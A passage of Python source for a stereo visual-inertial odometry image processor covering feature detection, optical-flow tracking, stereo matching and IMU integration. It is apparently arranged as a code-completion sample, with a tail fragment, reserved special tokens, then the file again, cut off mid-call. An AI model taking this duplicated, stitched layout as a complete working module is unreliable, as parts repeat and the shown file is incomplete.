scaling_factor = (len(pts1) + len(pts2)) / scaling_factor * np.sqrt(2)
for i in range(len(pts1)):
pts1[i] *= scaling_factor
pts2[i] *= scaling_factor
return pts1, pts2, scaling_factor
def get_grid_size(self, img):
"""
# Size of each grid.
"""
grid_height = int(np.ceil(img.shape[0] / self.config.grid_row))
grid_width = int(np.ceil(img.shape[1] / self.config.grid_col))
return grid_height, grid_width
def predict_feature_tracking(self, input_pts, R_p_c, intrinsics):
"""
predictFeatureTracking Compensates the rotation between consecutive
camera frames so that feature tracking would be more robust and fast.
Arguments:
input_pts: features in the previous image to be tracked.
R_p_c: a rotation matrix takes a vector in the previous camera
frame to the current camera frame. (matrix33)
intrinsics: intrinsic matrix of the camera. (vec3)
Returns:
compensated_pts: predicted locations of the features in the
current image based on the provided rotation.
"""
if len(input_pts) == 0:
return []
K = np.array([[intrinsics[0], 0.0, intrinsics[2]], [0.0, intrinsics
[1], intrinsics[3]], [0.0, 0.0, 1.0]])
H = K @ R_p_c @ np.linalg.inv(K)
compensated_pts = []
for i in range(len(input_pts)):
p1 = np.array([*input_pts[i], 1.0])
p2 = H @ p1
compensated_pts.append(p2[:2] / p2[2])
return np.array(compensated_pts, dtype=np.float32)
def stereo_match(self, cam0_points):
"""
Matches features with stereo image pairs.
Arguments:
cam0_points: points in the primary image.
Returns:
cam1_points: points in the secondary image.
inlier_markers: 1 if the match is valid, 0 otherwise.
"""
cam0_points = np.array(cam0_points)
if len(cam0_points) == 0:
return []
R_cam0_cam1 = self.R_cam1_imu.T @ self.R_cam0_imu
cam0_points_undistorted = self.undistort_points(cam0_points, self.
cam0_intrinsics, self.cam0_distortion_model, self.
cam0_distortion_coeffs, R_cam0_cam1)
cam1_points = self.distort_points(cam0_points_undistorted, self.
cam1_intrinsics, self.cam1_distortion_model, self.
cam1_distortion_coeffs)
cam1_points_copy = cam1_points.copy()
cam0_points = cam0_points.astype(np.float32)
cam1_points = cam1_points.astype(np.float32)
cam1_points, inlier_markers, _ = cv2.calcOpticalFlowPyrLK(self.
curr_cam0_pyramid, self.curr_cam1_pyramid, cam0_points,
cam1_points, **self.config.lk_params)
cam0_points_, _, _ = cv2.calcOpticalFlowPyrLK(self.
curr_cam1_pyramid, self.curr_cam0_pyramid, cam1_points,
cam0_points.copy(), **self.config.lk_params)
err = np.linalg.norm(cam0_points - cam0_points_, axis=1)
disparity = np.abs(cam1_points_copy[:, 1] - cam1_points[:, 1])
inlier_markers = np.logical_and.reduce([inlier_markers.reshape(-1),
err < 3, disparity < 20])
img = self.cam1_curr_img_msg.image
for i, point in enumerate(cam1_points):
if not inlier_markers[i]:
continue
if point[0] < 0 or point[0] > img.shape[1] - 1 or point[1
] < 0 or point[1] > img.shape[0] - 1:
inlier_markers[i] = 0
t_cam0_cam1 = self.R_cam1_imu.T @ (self.t_cam0_imu - self.t_cam1_imu)
E = skew(t_cam0_cam1) @ R_cam0_cam1
cam0_points_undistorted = self.undistort_points(cam0_points, self.
cam0_intrinsics, self.cam0_distortion_model, self.
cam0_distortion_coeffs)
cam1_points_undistorted = self.undistort_points(cam1_points, self.
cam1_intrinsics, self.cam1_distortion_model, self.
cam1_distortion_coeffs)
norm_pixel_unit = 4.0 / (self.cam0_intrinsics[0] + self.
cam0_intrinsics[1] + self.cam1_intrinsics[0] + self.
cam1_intrinsics[1])
for i in range(len(cam0_points_undistorted)):
if not inlier_markers[i]:
continue
pt0 = np.array([*cam0_points_undistorted[i], 1.0])
pt1 = np.array([*cam1_points_undistorted[i], 1.0])
epipolar_line = E @ pt0
error = np.abs((pt1 * epipolar_line)[0]) / np.linalg.norm(
epipolar_line[:2])
if error > self.config.stereo_threshold * norm_pixel_unit:
inlier_markers[i] = 0
return cam1_points, inlier_markers
def undistort_points(self, pts_in, intrinsics, distortion_model,
distortion_coeffs, rectification_matrix=np.identity(3),
new_intrinsics=np.array([1, 1, 0, 0])):
"""
Arguments:
pts_in: points to be undistorted.
intrinsics: intrinsics of the camera.
distortion_model: distortion model of the camera.
distortion_coeffs: distortion coefficients.
rectification_matrix:
new_intrinsics:
Returns:
pts_out: undistorted points.
"""
if len(pts_in) == 0:
return []
pts_in = np.reshape(pts_in, (-1, 1, 2))
K = np.array([[intrinsics[0], 0.0, intrinsics[2]], [0.0, intrinsics
[1], intrinsics[3]], [0.0, 0.0, 1.0]])
K_new = np.array([[new_intrinsics[0], 0.0, new_intrinsics[2]], [0.0,
new_intrinsics[1], new_intrinsics[3]], [0.0, 0.0, 1.0]])
if distortion_model == 'equidistant':
pts_out = cv2.fisheye.undistortPoints(pts_in, K,
distortion_coeffs, rectification_matrix, K_new)
else:
pts_out = cv2.undistortPoints(pts_in, K, distortion_coeffs,
None, rectification_matrix, K_new)
return pts_out.reshape((-1, 2))
def distort_points(self, pts_in, intrinsics, distortion_model,
distortion_coeffs):
"""
Arguments:
pts_in: points to be distorted.
intrinsics: intrinsics of the camera.
distortion_model: distortion model of the camera.
distortion_coeffs: distortion coefficients.
Returns:
pts_out: distorted points. (N, 2)
"""
if len(pts_in) == 0:
return []
K = np.array([[intrinsics[0], 0.0, intrinsics[2]], [0.0, intrinsics
[1], intrinsics[3]], [0.0, 0.0, 1.0]])
if distortion_model == 'equidistant':
pts_out = cv2.fisheye.distortPoints(pts_in, K, distortion_coeffs)
else:
homogenous_pts = cv2.convertPointsToHomogeneous(pts_in)
pts_out, _ = cv2.projectPoints(homogenous_pts, np.zeros(3), np.
zeros(3), K, distortion_coeffs)
return pts_out.reshape((-1, 2))
def draw_features_stereo(self):
img0 = self.cam0_curr_img_msg.image
img1 = self.cam1_curr_img_msg.image
kps0 = []
kps1 = []
matches = []
for feature in chain.from_iterable(self.curr_features):
matches.append(cv2.DMatch(len(kps0), len(kps0), 0))
kps0.append(cv2.KeyPoint(*feature.cam0_point, 1))
kps1.append(cv2.KeyPoint(*feature.cam1_point, 1))
img = cv2.drawMatches(img0, kps0, img1, kps1, matches, None, flags=2)
cv2.imshow('stereo features', img)
cv2.waitKey(1)
<|reserved_special_token_0|>
<|reserved_special_token_1|>
import numpy as np
import cv2
import time
from itertools import chain, compress
from collections import defaultdict, namedtuple
class FeatureMetaData(object):
"""
Contain necessary information of a feature for easy access.
"""
def __init__(self):
self.id = None # int
self.response = None # float
self.lifetime = None # int
self.cam0_point = None # vec2
self.cam1_point = None # vec2
class FeatureMeasurement(object):
"""
Stereo measurement of a feature.
"""
def __init__(self):
self.id = None
self.u0 = None
self.v0 = None
self.u1 = None
self.v1 = None
class ImageProcessor(object):
"""
Detect and track features in image sequences.
"""
def __init__(self, config):
self.config = config
# Indicate if this is the first image message.
self.is_first_img = True
# ID for the next new feature.
self.next_feature_id = 0
# Feature detector
self.detector = cv2.FastFeatureDetector_create(self.config.fast_threshold)
# IMU message buffer.
self.imu_msg_buffer = []
# Previous and current images
self.cam0_prev_img_msg = None
self.cam0_curr_img_msg = None
self.cam1_curr_img_msg = None
# Pyramids for previous and current image
self.prev_cam0_pyramid = None
self.curr_cam0_pyramid = None
self.curr_cam1_pyramid = None
# Features in the previous and current image.
# list of lists of FeatureMetaData
self.prev_features = [[] for _ in range(self.config.grid_num)] # Don't use [[]] * N
self.curr_features = [[] for _ in range(self.config.grid_num)]
# Number of features after each outlier removal step.
# keys: before_tracking, after_tracking, after_matching, after_ransac
self.num_features = defaultdict(int)
# load config
# Camera calibration parameters
self.cam0_resolution = config.cam0_resolution # vec2
self.cam0_intrinsics = config.cam0_intrinsics # vec4
self.cam0_distortion_model = config.cam0_distortion_model # string
self.cam0_distortion_coeffs = config.cam0_distortion_coeffs # vec4
self.cam1_resolution = config.cam1_resolution # vec2
self.cam1_intrinsics = config.cam1_intrinsics # vec4
self.cam1_distortion_model = config.cam1_distortion_model # string
self.cam1_distortion_coeffs = config.cam1_distortion_coeffs # vec4
# Take a vector from cam0 frame to the IMU frame.
self.T_cam0_imu = np.linalg.inv(config.T_imu_cam0)
self.R_cam0_imu = self.T_cam0_imu[:3, :3]
self.t_cam0_imu = self.T_cam0_imu[:3, 3]
# Take a vector from cam1 frame to the IMU frame.
self.T_cam1_imu = np.linalg.inv(config.T_imu_cam1)
self.R_cam1_imu = self.T_cam1_imu[:3, :3]
self.t_cam1_imu = self.T_cam1_imu[:3, 3]
self.image_id = 0
def stereo_callback(self, stereo_msg):
"""
Callback function for the stereo images.
"""
start = time.time()
self.cam0_curr_img_msg = stereo_msg.cam0_msg
self.cam1_curr_img_msg = stereo_msg.cam1_msg
# Build the image pyramids once since they're used at multiple places.
self.create_image_pyramids()
# Detect features in the first frame.
if self.is_first_img:
if not self.config.load_features_flag:
self.initialize_first_frame()
self.is_first_img = False
# Draw results.
# self.draw_features_stereo()
else:
if not self.config.load_features_flag:
# Track the feature in the previous image.
t = time.time()
self.track_features()
print('___track_features:', time.time() - t)
t = time.time()
# Add new features into the current image.
self.add_new_features()
print('___add_new_features:', time.time() - t)
t = time.time()
self.prune_features()
print('___prune_features:', time.time() - t)
t = time.time()
# Draw results.
# self.draw_features_stereo()
print('___draw_features_stereo:', time.time() - t)
t = time.time()
print('===image process elapsed:', time.time() - start, f'({stereo_msg.timestamp})')
if not self.config.load_features_flag:
try:
self.save_features()
return self.publish()
finally:
self.cam0_prev_img_msg = self.cam0_curr_img_msg
self.prev_features = self.curr_features
self.prev_cam0_pyramid = self.curr_cam0_pyramid
# Initialize the current features to empty vectors.
self.curr_features = [[] for _ in range(self.config.grid_num)]
else:
self.load_features()
return self.publish()
def imu_callback(self, msg):
"""
Callback function for the imu message.
"""
self.imu_msg_buffer.append(msg)
def create_image_pyramids(self):
"""
Create image pyramids used for KLT tracking.
(Seems doesn't work in python)
"""
curr_cam0_img = self.cam0_curr_img_msg.image
# self.curr_cam0_pyramid = cv2.buildOpticalFlowPyramid(
# curr_cam0_img, self.config.win_size, self.config.pyramid_levels,
# None, cv2.BORDER_REFLECT_101, cv2.BORDER_CONSTANT, False)[1]
self.curr_cam0_pyramid = curr_cam0_img
curr_cam1_img = self.cam1_curr_img_msg.image
# self.curr_cam1_pyramid = cv2.buildOpticalFlowPyramid(
# curr_cam1_img, self.config.win_size, self.config.pyramid_levels,
# None, cv2.BORDER_REFLECT_101, cv2.BORDER_CONSTANT, False)[1]
self.curr_cam1_pyramid = curr_cam1_img
def initialize_first_frame(self):
"""
Initialize the image processing sequence, which is basically detect
new features on the first set of stereo images.
"""
img = self.cam0_curr_img_msg.image
grid_height, grid_width = self.get_grid_size(img)
# Detect new features on the frist image.
new_features = self.detector.detect(img)
# Find the stereo matched points for the newly detected features.
cam0_points = [kp.pt for kp in new_features]
cam1_points, inlier_markers = self.stereo_match(cam0_points)
cam0_inliers, cam1_inliers = [], []
response_inliers = []
for i, inlier in enumerate(inlier_markers):
if not inlier:
continue
cam0_inliers.append(cam0_points[i])
cam1_inliers.append(cam1_points[i])
response_inliers.append(new_features[i].response)
# len(cam0_inliers) < max(5, 0.1 * len(new_features))
# Group the features into grids
grid_new_features = [[] for _ in range(self.config.grid_num)]
for i in range(len(cam0_inliers)):
cam0_point = cam0_inliers[i]
cam1_point = cam1_inliers[i]
response = response_inliers[i]
row = int(cam0_point[1] / grid_height)
col = int(cam0_point[0] / grid_width)
code = row*self.config.grid_col + col
new_feature = FeatureMetaData()
new_feature.response = response
new_feature.cam0_point = cam0_point
new_feature.cam1_point = cam1_point
grid_new_features[code].append(new_feature)
# Sort the new features in each grid based on its response.
# And collect new features within each grid with high response.
for i, new_features in enumerate(grid_new_features):
for feature in sorted(new_features, key=lambda x:x.response,
reverse=True)[:self.config.grid_min_feature_num]:
self.curr_features[i].append(feature)
self.curr_features[i][-1].id = self.next_feature_id
self.curr_features[i][-1].lifetime = 1
self.next_feature_id += 1
def track_features(self):
"""
Tracker features on the newly received stereo images.
"""
img = self.cam0_curr_img_msg.image
grid_height, grid_width = self.get_grid_size(img)
# Compute a rough relative rotation which takes a vector
# from the previous frame to the current frame.
cam0_R_p_c, cam1_R_p_c = self.integrate_imu_data()
# Organize the features in the previous image.
prev_ids = []
prev_lifetime = []
prev_cam0_points = []
prev_cam1_points = []
for feature in chain.from_iterable(self.prev_features):
prev_ids.append(feature.id)
prev_lifetime.append(feature.lifetime)
prev_cam0_points.append(feature.cam0_point)
prev_cam1_points.append(feature.cam1_point)
prev_cam0_points = np.array(prev_cam0_points, dtype=np.float32)
# Number of the features before tracking.
self.num_features['before_tracking'] = len(prev_cam0_points)
# Abort tracking if there is no features in the previous frame.
if len(prev_cam0_points) == 0:
return
# Track features using LK optical flow method.
curr_cam0_points = self.predict_feature_tracking(
prev_cam0_points, cam0_R_p_c, self.cam0_intrinsics)
curr_cam0_points, track_inliers, _ = cv2.calcOpticalFlowPyrLK(
self.prev_cam0_pyramid, self.curr_cam0_pyramid,
prev_cam0_points.astype(np.float32),
curr_cam0_points.astype(np.float32),
**self.config.lk_params)
# Mark those tracked points out of the image region as untracked.
for i, point in enumerate(curr_cam0_points):
if not track_inliers[i]:
continue
if (point[0] < 0 or point[0] > img.shape[1]-1 or
point[1] < 0 or point[1] > img.shape[0]-1):
track_inliers[i] = 0
# Collect the tracked points.
prev_tracked_ids = select(prev_ids, track_inliers)
prev_tracked_lifetime = select(prev_lifetime, track_inliers)
prev_tracked_cam0_points = select(prev_cam0_points, track_inliers)
prev_tracked_cam1_points = select(prev_cam1_points, track_inliers)
curr_tracked_cam0_points = select(curr_cam0_points, track_inliers)
# Number of features left after tracking.
self.num_features['after_tracking'] = len(curr_tracked_cam0_points)
# Outlier removal involves three steps, which forms a close
# loop between the previous and current frames of cam0 (left)
# and cam1 (right). Assuming the stereo matching between the
# previous cam0 and cam1 images are correct, the three steps are:
#
# prev frames cam0 ----------> cam1
# | |
# |ransac |ransac
# | stereo match |
# curr frames cam0 ----------> cam1
#
# 1) Stereo matching between current images of cam0 and cam1.
# 2) RANSAC between previous and current images of cam0.
# 3) RANSAC between previous and current images of cam1.
#
# For Step 3, tracking between the images is no longer needed.
# The stereo matching results are directly used in the RANSAC.
# Step 1: stereo matching.
curr_cam1_points, match_inliers = self.stereo_match(
curr_tracked_cam0_points)
prev_matched_ids = select(prev_tracked_ids, match_inliers)
prev_matched_lifetime = select(prev_tracked_lifetime, match_inliers)
prev_matched_cam0_points = select(prev_tracked_cam0_points, match_inliers)
prev_matched_cam1_points = select(prev_tracked_cam1_points, match_inliers)
curr_matched_cam0_points = select(curr_tracked_cam0_points, match_inliers)
curr_matched_cam1_points = select(curr_cam1_points, match_inliers)
# Number of features left after stereo matching.
self.num_features['after_matching'] = len(curr_matched_cam0_points)
# Step 2 and 3: RANSAC on temporal image pairs of cam0 and cam1.
# cam0_ransac_inliers = self.two_point_ransac(
# prev_matched_cam0_points, curr_matched_cam0_points,
# cam0_R_p_c, self.cam0_intrinsics,
# self.cam0_distortion_model, self.cam0_distortion_coeffs,
# self.config.ransac_threshold, 0.99)
# cam1_ransac_inliers = self.two_point_ransac(
# prev_matched_cam1_points, curr_matched_cam1_points,
# cam1_R_p_c, self.cam1_intrinsics,
# self.cam1_distortion_model, self.cam1_distortion_coeffs,
# self.config.ransac_threshold, 0.99)
cam0_ransac_inliers = [1] * len(prev_matched_cam0_points)
cam1_ransac_inliers = [1] * len(prev_matched_cam1_points)
# Number of features after ransac.
after_ransac = 0
for i in range(len(cam0_ransac_inliers)):
if not (cam0_ransac_inliers[i] and cam1_ransac_inliers[i]):
continue
row = int(curr_matched_cam0_points[i][1] / grid_height)
col = int(curr_matched_cam0_points[i][0] / grid_width)
code = row * self.config.grid_col + col
grid_new_feature = FeatureMetaData()
grid_new_feature.id = prev_matched_ids[i]
grid_new_feature.lifetime = prev_matched_lifetime[i] + 1
grid_new_feature.cam0_point = curr_matched_cam0_points[i]
grid_new_feature.cam1_point = curr_matched_cam1_points[i]
prev_matched_lifetime[i] += 1
self.curr_features[code].append(grid_new_feature)
after_ransac += 1
self.num_features['after_ransac'] = after_ransac
# Compute the tracking rate.
# prev_feature_num = sum([len(x) for x in self.prev_features])
# curr_feature_num = sum([len(x) for x in self.curr_features])
def add_new_features(self):
"""
Detect new features on the image to ensure that the features are
uniformly distributed on the image.
"""
curr_img = self.cam0_curr_img_msg.image
grid_height, grid_width = self.get_grid_size(curr_img)
# Create a mask to avoid redetecting existing features.
mask = np.ones(curr_img.shape[:2], dtype='uint8')
for feature in chain.from_iterable(self.curr_features):
x, y = map(int, feature.cam0_point)
mask[y-3:y+4, x-3:x+4] = 0
# Detect new features.
new_features = self.detector.detect(curr_img, mask=mask)
# Collect the new detected features based on the grid.
# Select the ones with top response within each grid afterwards.
new_feature_sieve = [[] for _ in range(self.config.grid_num)]
for feature in new_features:
row = int(feature.pt[1] / grid_height)
col = int(feature.pt[0] / grid_width)
code = row * self.config.grid_col + col
new_feature_sieve[code].append(feature)
new_features = []
for features in new_feature_sieve:
if len(features) > self.config.grid_max_feature_num:
features = sorted(features, key=lambda x:x.response,
reverse=True)[:self.config.grid_max_feature_num]
new_features.append(features)
new_features = list(chain.from_iterable(new_features))
# Find the stereo matched points for the newly detected features.
cam0_points = [kp.pt for kp in new_features]
cam1_points, inlier_markers = self.stereo_match(cam0_points)
cam0_inliers, cam1_inliers, response_inliers = [], [], []
for i, inlier in enumerate(inlier_markers):
if not inlier:
continue
cam0_inliers.append(cam0_points[i])
cam1_inliers.append(cam1_points[i])
response_inliers.append(new_features[i].response)
# if len(cam0_inliers) < max(5, len(new_features) * 0.1):
# Group the features into grids
grid_new_features = [[] for _ in range(self.config.grid_num)]
for i in range(len(cam0_inliers)):
cam0_point = cam0_inliers[i]
cam1_point = cam1_inliers[i]
response = response_inliers[i]
row = int(cam0_point[1] / grid_height)
col = int(cam0_point[0] / grid_width)
code = row*self.config.grid_col + col
new_feature = FeatureMetaData()
new_feature.response = response
new_feature.cam0_point = cam0_point
new_feature.cam1_point = cam1_point
grid_new_features[code].append(new_feature)
# Sort the new features in each grid based on its response.
# And collect new features within each grid with high response.
for i, new_features in enumerate(grid_new_features):
for feature in sorted(new_features, key=lambda x:x.response,
reverse=True)[:self.config.grid_min_feature_num]:
self.curr_features[i].append(feature)
self.curr_features[i][-1].id = self.next_feature_id
self.curr_features[i][-1].lifetime = 1
self.next_feature_id += 1
def prune_features(self):
"""
Remove some of the features of a grid in case there are too many
features inside of that grid, which ensures the number of features
within each grid is bounded.
"""
for i, features in enumerate(self.curr_features):
# Continue if the number of features in this grid does
# not exceed the upper bound.
if len(features) <= self.config.grid_max_feature_num:
continue
self.curr_features[i] = sorted(features, key=lambda x:x.lifetime,
reverse=True)[:self.config.grid_max_feature_num]
def load_features(self):
# load features
filename = self.config.result_dir + str(self.image_id) + ".npz"
self.curr_features = np.load(filename, allow_pickle=True)['arr_0']
self.image_id += 1
def save_features(self):
# save features
filename = self.config.result_dir + str(self.image_id) + ".npz"
np.savez(filename, self.curr_features)
self.image_id += 1
def publish(self):
"""
Publish the features on the current image including both the
tracked and newly detected ones.
"""
curr_ids = []
curr_cam0_points = []
curr_cam1_points = []
for feature in chain.from_iterable(self.curr_features):
curr_ids.append(feature.id)
curr_cam0_points.append(feature.cam0_point)
curr_cam1_points.append(feature.cam1_point)
curr_cam0_points_undistorted = self.undistort_points(
curr_cam0_points, self.cam0_intrinsics,
self.cam0_distortion_model, self.cam0_distortion_coeffs)
curr_cam1_points_undistorted = self.undistort_points(
curr_cam1_points, self.cam1_intrinsics,
self.cam1_distortion_model, self.cam1_distortion_coeffs)
features = []
for i in range(len(curr_ids)):
fm = FeatureMeasurement()
fm.id = curr_ids[i]
fm.u0 = curr_cam0_points_undistorted[i][0]
fm.v0 = curr_cam0_points_undistorted[i][1]
fm.u1 = curr_cam1_points_undistorted[i][0]
fm.v1 = curr_cam1_points_undistorted[i][1]
features.append(fm)
feature_msg = namedtuple('feature_msg', ['timestamp', 'features'])(
self.cam0_curr_img_msg.timestamp, features)
return feature_msg
def integrate_imu_data(self):
"""
Integrates the IMU gyro readings between the two consecutive images,
which is used for both tracking prediction and 2-point RANSAC.
Returns:
cam0_R_p_c: a rotation matrix which takes a vector from previous
cam0 frame to current cam0 frame.
cam1_R_p_c: a rotation matrix which takes a vector from previous
cam1 frame to current cam1 frame.
"""
# Find the start and the end limit within the imu msg buffer.
idx_begin = None
for i, msg in enumerate(self.imu_msg_buffer):
if msg.timestamp >= self.cam0_prev_img_msg.timestamp - 0.01:
idx_begin = i
break
idx_end = None
for i, msg in enumerate(self.imu_msg_buffer):
if msg.timestamp >= self.cam0_curr_img_msg.timestamp - 0.004:
idx_end = i
break
if idx_begin is None or idx_end is None:
return np.identity(3), np.identity(3)
# Compute the mean angular velocity in the IMU frame.
mean_ang_vel = np.zeros(3)
for i in range(idx_begin, idx_end):
mean_ang_vel += self.imu_msg_buffer[i].angular_velocity
if idx_end > idx_begin:
mean_ang_vel /= (idx_end - idx_begin)
# Transform the mean angular velocity from the IMU frame to the
# cam0 and cam1 frames.
cam0_mean_ang_vel = self.R_cam0_imu.T @ mean_ang_vel
cam1_mean_ang_vel = self.R_cam1_imu.T @ mean_ang_vel
# Compute the relative rotation.
dt = self.cam0_curr_img_msg.timestamp - self.cam0_prev_img_msg.timestamp
cam0_R_p_c = cv2.Rodrigues(cam0_mean_ang_vel * dt)[0].T
cam1_R_p_c = cv2.Rodrigues(cam1_mean_ang_vel * dt)[0].T
# Delete the useless and used imu messages.
self.imu_msg_buffer = self.imu_msg_buffer[idx_end:]
return cam0_R_p_c, cam1_R_p_c
def rescale_points(self, pts1, pts2):
"""
Arguments:
pts1: first set of points.
pts2: second set of points.
Returns:
pts1: scaled first set of points.
pts2: scaled second set of points.
scaling_factor: scaling factor
"""
scaling_factor = 0
for pt1, pt2 in zip(pts1, pts2):
scaling_factor += np.linalg.norm(pt1)
scaling_factor += np.linalg.norm(pt2)
scaling_factor = (len(pts1) + len(pts2)) / scaling_factor * np.sqrt(2)
for i in range(len(pts1)):
pts1[i] *= scaling_factor
pts2[i] *= scaling_factor
return pts1, pts2, scaling_factor
# def two_point_ransac(self, pts1, pts2, R_p_c, intrinsics,
# distortion_model, distortion_coeffs,
# inlier_error, success_probability):
# """
# Applies two point ransac algorithm to mark the inliers in the input set.
# Arguments:
# pts1: first set of points.
# pts2: second set of points.
# R_p_c: a rotation matrix takes a vector in the previous camera frame
# to the current camera frame.
# intrinsics: intrinsics of the camera.
# distortion_model: distortion model of the camera.
# distortion_coeffs: distortion coefficients.
# inlier_error: acceptable error to be considered as an inlier.
# success_probability: the required probability of success.
# Returns:
# inlier_flag: 1 for inliers and 0 for outliers.
# """
# # Check the size of input point size.
# assert len(pts1) == len(pts2), 'Sets of different size are used...'
# norm_pixel_unit = 2.0 / (intrinsics[0] + intrinsics[1])
# iter_num = int(np.ceil(np.log(1-success_probability) / np.log(1-0.7*0.7)))
# # Initially, mark all points as inliers.
# inlier_markers = [1] * len(pts1)
# # Undistort all the points.
# pts1_undistorted = self.undistort_points(pts1, intrinsics,
# distortion_model, distortion_coeffs)
# pts2_undistorted = self.undistort_points(pts2, intrinsics,
# distortion_model, distortion_coeffs)
# # Compenstate the points in the previous image with
# # the relative rotation.
# for i, pt in enumerate(pts1_undistorted):
# pt_h = np.array([*pt, 1.0])
# pt_hc = R_p_c @ pt_h
# pts1_undistorted[i] = pt_hc[:2]
# # Normalize the points to gain numerical stability.
# pts1_undistorted, pts2_undistorted, scaling_factor = self.rescale_points(
# pts1_undistorted, pts2_undistorted)
# # Compute the difference between previous and current points,
# # which will be used frequently later.
# pts_diff = []
# for pt1, pt2 in zip(pts1_undistorted, pts2_undistorted):
# pts_diff.append(pt1 - pt2)
# # Mark the point pairs with large difference directly.
# # BTW, the mean distance of the rest of the point pairs are computed.
# mean_pt_distance = 0.0
# raw_inlier_count = 0
# for i, pt_diff in enumerate(pts_diff):
# distance = np.linalg.norm(pt_diff)
# # 25 pixel distance is a pretty large tolerance for normal motion.
# # However, to be used with aggressive motion, this tolerance should
# # be increased significantly to match the usage.
# if distance > 50.0 * norm_pixel_unit:
# inlier_markers[i] = 0
# else:
# mean_pt_distance += distance
# raw_inlier_count += 1
# mean_pt_distance /= raw_inlier_count
# # If the current number of inliers is less than 3, just mark
# # all input as outliers. This case can happen with fast
# # rotation where very few features are tracked.
# if raw_inlier_count < 3:
# return [0] * len(inlier_markers)
# # Before doing 2-point RANSAC, we have to check if the motion
# # is degenerated, meaning that there is no translation between
# # the frames, in which case, the model of the RANSAC does not work.
# # If so, the distance between the matched points will be almost 0.
# if mean_pt_distance < norm_pixel_unit:
# for i, pt_diff in enumerate(pts_diff):
# if inlier_markers[i] == 0:
# continue
# if np.linalg.norm(pt_diff) > inlier_error * norm_pixel_unit:
# inlier_markers[i] = 0
# return inlier_markers
# # In the case of general motion, the RANSAC model can be applied.
# # The three column corresponds to tx, ty, and tz respectively.
# coeff_t = []
# for i, pt_diff in enumerate(pts_diff):
# coeff_t.append(np.array([
# pt_diff[1],
# -pt_diff[0],
# pts1_undistorted[0] * pts2_undistorted[1] -
# pts1_undistorted[1] * pts2_undistorted[0]]))
# coeff_t = np.array(coeff_t)
# raw_inlier_idx = np.where(inlier_markers)[0]
# best_inlier_set = []
# best_error = 1e10
# for i in range(iter_num):
# # Randomly select two point pairs.
# # Although this is a weird way of selecting two pairs, but it
# # is able to efficiently avoid selecting repetitive pairs.
# pair_idx1 = np.random.choice(raw_inlier_idx)
# idx_diff = np.random.randint(1, len(raw_inlier_idx))
# pair_idx2 = (pair_idx1+idx_diff) % len(raw_inlier_idx)
# # Construct the model.
# coeff_t_ = np.array([coeff_t[pair_idx1], coeff_t[pair_idx2]])
# coeff_tx = coeff_t_[:, 0]
# coeff_ty = coeff_t_[:, 1]
# coeff_tz = coeff_t_[:, 2]
# coeff_l1_norm = np.linalg.norm(coeff_t_, 1, axis=0)
# base_indicator = np.argmin(coeff_l1_norm)
# if base_indicator == 0:
# A = np.array([coeff_ty, coeff_tz]).T
# solution = np.linalg.inv(A) @ (-coeff_tx)
# model = [1.0, *solution]
# elif base_indicator == 1:
# A = np.array([coeff_tx, coeff_tz]).T
# solution = np.linalg.inv(A) @ (-coeff_ty)
# model = [solution[0], 1.0, solution[1]]
# else:
# A = np.array([coeff_tx, coeff_ty]).T
# solution = np.linalg.inv(A) @ (-coeff_tz)
# model = [*solution, 1.0]
# # Find all the inliers among point pairs.
# error = coeff_t @ model
# inlier_set = []
# for i, e in enumerate(error):
# if inlier_markers[i] == 0:
# continue
# if np.abs(e) < inlier_error * norm_pixel_unit:
# inlier_set.append(i)
# # If the number of inliers is small, the current model is
# # probably wrong.
# if len(inlier_set) < 0.2 * len(pts1_undistorted):
# continue
# # Refit the model using all of the possible inliers.
# coeff_t_ = coeff_t[inlier_set]
# coeff_tx_better = coeff_t_[:, 0]
# coeff_ty_better = coeff_t_[:, 1]
# coeff_tz_better = coeff_t_[:, 2]
# if base_indicator == 0:
# A = np.array([coeff_ty_better, coeff_tz_better]).T
# solution = np.linalg.inv(A.T @ A) @ A.T @ (-coeff_tx_better)
# model_better = [1.0, *solution]
# elif base_indicator == 1:
# A = np.array([coeff_tx_better, coeff_tz_better]).T
# solution = np.linalg.inv(A.T @ A) @ A.T @ (-coeff_ty_better)
# model_better = [solution[0], 1.0, solution[1]]
# else:
# A = np.array([coeff_tx_better, coeff_ty_better]).T
# solution = np.linalg.inv(A.T @ A) @ A.T @ (-coeff_tz_better)
# model_better = [*solution, 1.0]
# # Compute the error and upate the best model if possible.
# new_error = coeff_t @ model_better
# this_error = np.mean([np.abs(new_error[i]) for i in inlier_set])
# if len(inlier_set) > best_inlier_set:
# best_error = this_error
# best_inlier_set = inlier_set
# # Fill in the markers.
# inlier_markers = [0] * len(pts1)
# for i in best_inlier_set:
# inlier_markers[i] = 1
# return inlier_markers
def get_grid_size(self, img):
"""
# Size of each grid.
"""
grid_height = int(np.ceil(img.shape[0] / self.config.grid_row))
grid_width = int(np.ceil(img.shape[1] / self.config.grid_col))
return grid_height, grid_width
def predict_feature_tracking(self, input_pts, R_p_c, intrinsics):
"""
predictFeatureTracking Compensates the rotation between consecutive
camera frames so that feature tracking would be more robust and fast.
Arguments:
input_pts: features in the previous image to be tracked.
R_p_c: a rotation matrix takes a vector in the previous camera
frame to the current camera frame. (matrix33)
intrinsics: intrinsic matrix of the camera. (vec3)
Returns:
compensated_pts: predicted locations of the features in the
current image based on the provided rotation.
"""
# Return directly if there are no input features.
if len(input_pts) == 0:
return []
# Intrinsic matrix.
K = np.array([
[intrinsics[0], 0.0, intrinsics[2]],
[0.0, intrinsics[1], intrinsics[3]],
[0.0, 0.0, 1.0]])
H = K @ R_p_c @ np.linalg.inv(K)
compensated_pts = []
for i in range(len(input_pts)):
p1 = np.array([*input_pts[i], 1.0])
p2 = H @ p1
compensated_pts.append(p2[:2] / p2[2])
return np.array(compensated_pts, dtype=np.float32)
def stereo_match(self, cam0_points):
"""
Matches features with stereo image pairs.
Arguments:
cam0_points: points in the primary image.
Returns:
cam1_points: points in the secondary image.
inlier_markers: 1 if the match is valid, 0 otherwise.
"""
cam0_points = np.array(cam0_points)
if len(cam0_points) == 0:
return []
R_cam0_cam1 = self.R_cam1_imu.T @ self.R_cam0_imu
cam0_points_undistorted = self.undistort_points(
cam0_points, self.cam0_intrinsics,
self.cam0_distortion_model, self.cam0_distortion_coeffs, R_cam0_cam1)
cam1_points = self.distort_points(
cam0_points_undistorted, self.cam1_intrinsics,
self.cam1_distortion_model, self.cam1_distortion_coeffs)
cam1_points_copy = cam1_points.copy()
# Track features using LK optical flow method.
cam0_points = cam0_points.astype(np.float32)
cam1_points = cam1_points.astype(np.float32)
cam1_points, inlier_markers, _ = cv2.calcOpticalFlowPyrLK(
self.curr_cam0_pyramid, self.curr_cam1_pyramid,
